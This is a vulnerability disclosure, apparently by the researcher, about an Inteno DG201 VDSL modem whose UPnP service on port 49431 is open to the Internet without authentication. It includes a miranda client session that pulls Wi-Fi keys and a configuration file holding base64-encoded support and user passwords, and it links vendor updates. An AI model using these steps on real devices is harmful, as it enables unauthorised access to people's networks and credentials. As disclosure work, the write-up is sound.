Intro

This vulnerability is reported 2013-11-22 and it is fixed couple of month after that.

DG201 VDSL-box has some kind of UPnP -service open to the Internet by default. Even if the box has set to bridge mode, VDSL-box will take own public IP from the Internet.

From UPnP-service you can for example download device configuration which include passwords for Wifi and Accounts in the box. It is also possible to change configuration in the device. All this can be done without any authentication.

• Software version: DG201A-W2U4U_4.06DNT0934.2

  • 

Details

UPnP service can be found from port TCP 49431.

Get UPnP client and start using the service. I used miranda: https://code.google.com/p/miranda-upnp/

Example

I have manually added my public IP to the configuration which is basically list of hosts in python pickle.

$ python miranda.py -s upnp-inteno.mir 

Miranda v1.3
The interactive UPnP client
Craig Heffner, http://www.devttys0.com


Host data restored:

        [0] 10.0.2.187:8888
        [1] 192.168.1.1:49431
        [2] 192.168.1.1:49431
        [3] 213.216.x.x:49431
        [4] 85.131.x.x:49431

upnp> host get 3

Requesting device and service info for 213.216.x.x:49431 (this could take a few seconds)...

Host data enumeration complete!

upnp> host send 3 LANDevice WLANConfiguration GetSecurityKeys

NewWEPKey3 : 1234567890123
NewWEPKey2 : 1234567890123
NewWEPKey1 : 1234567890123
NewWEPKey0 : 1234567890123
NewKeyPassphrase : 
NewPreSharedKey : 12345678
upnp> host send 3 InternetGatewayDevice DeviceConfig GetConfiguration

NewConfigFile : <?xml version="1.0"?>
<DslCpeConfig version="3.0">
  <InternetGatewayDevice>
    <LANDeviceNumberOfEntries>1</LANDeviceNumberOfEntries>
    <WANDeviceNumberOfEntries>3</WANDeviceNumberOfEntries>
    <DeviceInfo>
      <ProvisioningCode>12345</ProvisioningCode>
      <FirstUseDate>2012-04-11T14:46:01+00:00</FirstUseDate>
      <VendorConfigFileNumberOfEntries>0</VendorConfigFileNumberOfEntries>
    </DeviceInfo>
    <X_BROADCOM_COM_SyslogCfg>
      <Status>Enabled</Status>
      <Option>local buffer and remote</Option>
      <LocalDisplayLevel>Debug</LocalDisplayLevel>
      <ServerIPAddress>10.0.0.1</ServerIPAddress>
    </X_BROADCOM_COM_SyslogCfg>
    <X_BROADCOM_COM_LoginCfg>
      <SupportPassword>ZG5hcjNzY3VlMTEyAA==</SupportPassword>
      <UserPassword>dXNlcgo=</UserPassword>
    </X_BROADCOM_COM_LoginCfg>

...

Update available

• https://www.dna.fi/documents/15182/76543/Inteno_DNA_DG201+ja+EG500_modeemin_paivitys.pdf/87f2f9da-9360-440e-8113-03f277d524f4

• https://www.dna.fi/documents/15182/76216/DG201A-W2U4U_4.06DNT0936.1_20140127/7f4c2113-32f2-422f-bdd5-e7a1062373c1

Contacts

• Mikko Kenttälä, Turmio @ IRCnet, mikko.kenttala(ä)iki.fi

Linked in pages: Hacking Inetno DG201A